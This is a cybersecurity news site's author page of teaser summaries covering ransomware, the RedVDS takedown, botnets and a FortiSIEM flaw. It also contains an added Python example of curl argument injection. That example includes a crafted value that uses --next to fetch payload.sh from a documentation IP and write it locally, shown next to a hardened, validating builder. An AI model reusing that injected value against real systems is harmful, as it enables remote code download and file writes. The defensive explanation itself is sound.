Author: Staff Writer


John Marcelli is a staff writer for the CISO Brief, with a passion for exploring and writing about the ever-evolving world of technology. From emerging trends to in-depth reviews of the latest gadgets, John stays at the forefront of innovation, delivering engaging content that informs and inspires readers. When he's not writing, he enjoys experimenting with new tech tools and diving into the digital landscape.

Fast Facts In December 2025, the Sicarii ransomware operation emerged as a uniquely ideological group with Israeli/Jewish affiliations, openly displaying Hebrew language and symbols like Haganah. Unlike typical cybercriminal groups, Sicarii targets organizations in Arab and Muslim countries, employing geo-fencing to exclude Israeli systems and using sophisticated infrastructure for stealth and resilience. The malware performs network reconnaissance, exploits vulnerabilities like CVE-2025-64446 on Fortinet devices, and exfiltrates extensive data—including credentials and chat info—before encrypting files with AES-GCM and deploying destructive bootloader corruption. Organizations should focus on patching Fortinet devices, implementing network segmentation, and monitoring for zero-day exploits to defend against this…


Essential Insights In 2025, global ransomware attacks increased by 32%, totaling 7,419 incidents, with manufacturing being the most targeted sector and attack volumes rising significantly across various industries. Despite the rise in attacks, the average ransom demand decreased by 26% to $1.04 million, though manufacturing saw ransom demands more than double, reaching nearly $1.2 million. The United States experienced over 51% of attacks, with 3,810 incidents, and accounted for the highest number of affected records, including major breaches like Conduent and Episource, impacting millions. Qilin emerged as the most prolific ransomware group, responsible for 14% of attacks and claiming to…


Essential Insights A joint effort by Microsoft and global law enforcement dismantled the RedVDS-powered business email compromise (BEC) network, which operated as a low-cost cybercrime subscription platform providing virtual machines to threat actors. RedVDS enabled extensive phishing campaigns, fake portals, and payment diversion schemes targeting organizations in finance, real estate, healthcare, and manufacturing, compromising over 191,000 organizations worldwide. The attack chain involved renting RedVDS instances to send targeted phishing emails, harvesting credentials, monitoring email threads, and injecting fake replies to redirect large payments through fake bank details. The operation seized RedVDS domains, disrupted payment channels, and highlights the importance of…


Summary Points An international operation carried out jointly by Microsoft and authorities from Germany, the United States and the United Kingdom has dismantled the cybercrime service RedVDS, including the seizure of servers in Germany. RedVDS offered cybercriminals a cloud-based infrastructure for anonymously sending phishing e-mails at scale and operating malware, causing damage described as running into the billions. The total loss is estimated at several hundred million euros, spread across numerous individual victims, including companies, government agencies and private individuals worldwide. RedVDS used a subscription model that provided virtual servers for 24 dollars a month in order to guarantee the perpetrators' anonymity, which hampered law-enforcement efforts. What’s the Problem? In a highly coordinated effort,…


Top Highlights Threat actors linked to Chinese hosting infrastructure have established over 18,000 active command-and-control (C2) servers across 48 providers, with C2 activity accounting for roughly 84% of malicious activity in Chinese hosting environments. Major providers like China Unicom, Alibaba Cloud, and Tencent host the majority of these C2 servers, facilitating widespread malicious operations including botnets, cybercrime, and espionage. Malware families such as Mozi, ARL, Cobalt Strike, Vshell, and Mirai dominate the infrastructure, enabling attackers to operate across diverse campaigns while traditional detection methods struggle to track constantly evolving indicators. The extensive, shared infrastructure underscores the importance of holistic threat…


Essential Insights Ransomware groups are increasingly threatening victims with regulatory violations, especially targeting high-risk industries like healthcare, to coerce ransom payments. This form of “compliance extortion” forces companies to balance ransom costs against potentially crippling penalties and reputational damage. AI tools enable criminals to rapidly identify, craft, and threaten compliance violations, increasing the severity and speed of attacks amid stricter regulations like EU DORA and SEC rules. The ambiguity around compliance consequences amplifies fears, as either self-reporting or criminal threats to authorities carry significant, unpredictable risks for organizations. Key Challenge Recent reports reveal an alarming rise in ransomware attacks where…


Quick Takeaways Launch of Cloud Storage: March Networks has introduced a new Cloud Storage solution, collaborating with AWS, designed to help organizations securely retain video without high costs. Cost-Effective Model: The tiered cloud storage approach allows businesses to reduce long-term storage expenses by up to 80%, providing rapid access to recent footage while archiving older videos securely. Proven Savings: A customer with 580 cameras cut annual storage costs from $1.7 million to approximately $347,000, showcasing the financial benefits of March Networks’ cloud solution. Enhanced Software Capabilities: The update includes AI-driven features for faster searches and improved usability, along with new…


Essential Insights The Kimwolf botnet, emerging from the Aisuru DDoS botnet in August 2025, rapidly gained attention by temporarily dominating Cloudflare’s global domain rankings and infecting over 2 million Android TV devices through exploited residential proxy networks. Operators of Kimwolf, linked to previous cybercriminal groups, have shown they can quickly adapt tactics, such as shifting infrastructure and evading detection, with ongoing efforts to block command and control servers. The botnet primarily conducts brief but intense DDoS attacks, frequently targeting Minecraft servers, with some episodes lasting hours, and has so far avoided critical infrastructure but poses a potential for severe damage.…


Essential Insights In August 2025, Fortinet disclosed a severe OS command injection vulnerability (CVE-2025-25256) in FortiSIEM that allows unauthenticated remote code execution via crafted CLI requests, with exploits already active in the wild. The vulnerability involves an argument injection flaw leading to arbitrary file writes and privilege escalation to root, facilitated through the handling of user-controlled XML tags and the use of curl with the --next flag. Attackers can leverage this flaw to overwrite critical files like phLicenseTool with malicious scripts, gaining persistent admin and root access by exploiting cron jobs and writable files in the system. Fortinet recommends immediate…
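The argument-injection mechanism this teaser describes, as an added illustration that is not FortiSIEM code and makes no claim about the actual vulnerable component: a user-controlled value spliced into a shell string becomes several curl arguments, and curl's --next starts a second transfer that can carry its own -o output path, which is what turns a fetch into a local file write. The attacker value, the IP 203.0.113.10 and the path /tmp/dropped.sh are constructed for the example; the hardened builder below (a reasonable fix, not Fortinet's patch) passes the value as a single argv element behind --url after validating it, so no shell parsing ever happens:

```python
"""Argument injection into a curl command line, and a hardened builder.

Illustrative example only (not FortiSIEM or Fortinet code). It models the
generic pattern: untrusted input interpolated into a shell command gains
extra arguments, and curl's --next lets a second transfer specify -o.
"""
from __future__ import annotations

import shlex
from urllib.parse import urlparse

# Constructed attacker input: a plausible URL followed by a second transfer
# that writes the fetched body to a local path. Addresses/paths are made up.
INJECTED_VALUE = (
    "http://203.0.113.10/ping --next http://203.0.113.10/payload.sh "
    "-o /tmp/dropped.sh"
)


def build_argv_unsafe(value: str) -> list[str]:
    """Vulnerable pattern: the value is interpolated into a shell string, so
    whitespace inside it is split into separate curl arguments."""
    return shlex.split(f"curl -s {value}")


def build_argv_safe(value: str) -> list[str]:
    """Hardened pattern: require a single http(s) URL, reject anything that
    looks like an option or contains whitespace, and pass it as one argv
    element behind --url so curl never parses it as an option. No shell."""
    parsed = urlparse(value)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        raise ValueError(f"not an http(s) URL: {value!r}")
    if value.startswith("-") or any(ch.isspace() for ch in value):
        raise ValueError(f"rejected suspicious URL: {value!r}")
    return ["curl", "-s", "--url", value]


def accepted_by_safe_builder(value: str) -> bool:
    """True if the hardened builder accepts the value, False if it rejects it."""
    try:
        build_argv_safe(value)
        return True
    except ValueError:
        return False


def transfers(argv: list[str]) -> list[list[str]]:
    """Split a curl argv into the per-transfer argument groups that --next creates."""
    groups: list[list[str]] = []
    current: list[str] = []
    for arg in argv[1:]:
        if arg == "--next":
            groups.append(current)
            current = []
        else:
            current.append(arg)
    groups.append(current)
    return groups


def output_paths(argv: list[str]) -> list[str]:
    """Local paths curl would write to: the value after each -o/--output,
    across every transfer group. Useful for auditing a built command line
    before executing it."""
    paths: list[str] = []
    for group in transfers(argv):
        it = iter(group)
        for arg in it:
            if arg in ("-o", "--output"):
                paths.append(next(it, ""))
    return paths


if __name__ == "__main__":
    unsafe = build_argv_unsafe(INJECTED_VALUE)
    print("unsafe argv:", unsafe)
    print("transfers:", len(transfers(unsafe)), "writes:", output_paths(unsafe))
    print("safe builder accepts injected value:", accepted_by_safe_builder(INJECTED_VALUE))
    print("safe argv:", build_argv_safe("https://example.com/health"))
```

The takeaway is that the fix is structural rather than a denylist of flags: build argv as a list, never through a shell, validate the value as the one type it is supposed to be, and anchor it behind an option such as --url so a leading dash cannot change its meaning.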


Quick Takeaways Ransomware Surge: Ransomware attacks on telecommunications companies have surged nearly fourfold from 2022 to 2025, with incidents increasing from 24 to 90 as cybercriminals target critical infrastructure and sensitive subscriber data. Data Theft Incidents: A total of 444 incidents of data theft have been reported, including 133 instances of stolen databases potentially containing sensitive customer information. Geopolitical Motivations: Hackers are primarily motivated by the resale of customer data and strategic advantages in international conflicts, exacerbated by vulnerabilities in internet-facing infrastructure. Predominant Threat Actors: Major cybercrime gangs like Qilin, Akira, and Play led the ransomware attacks, targeting primarily companies…
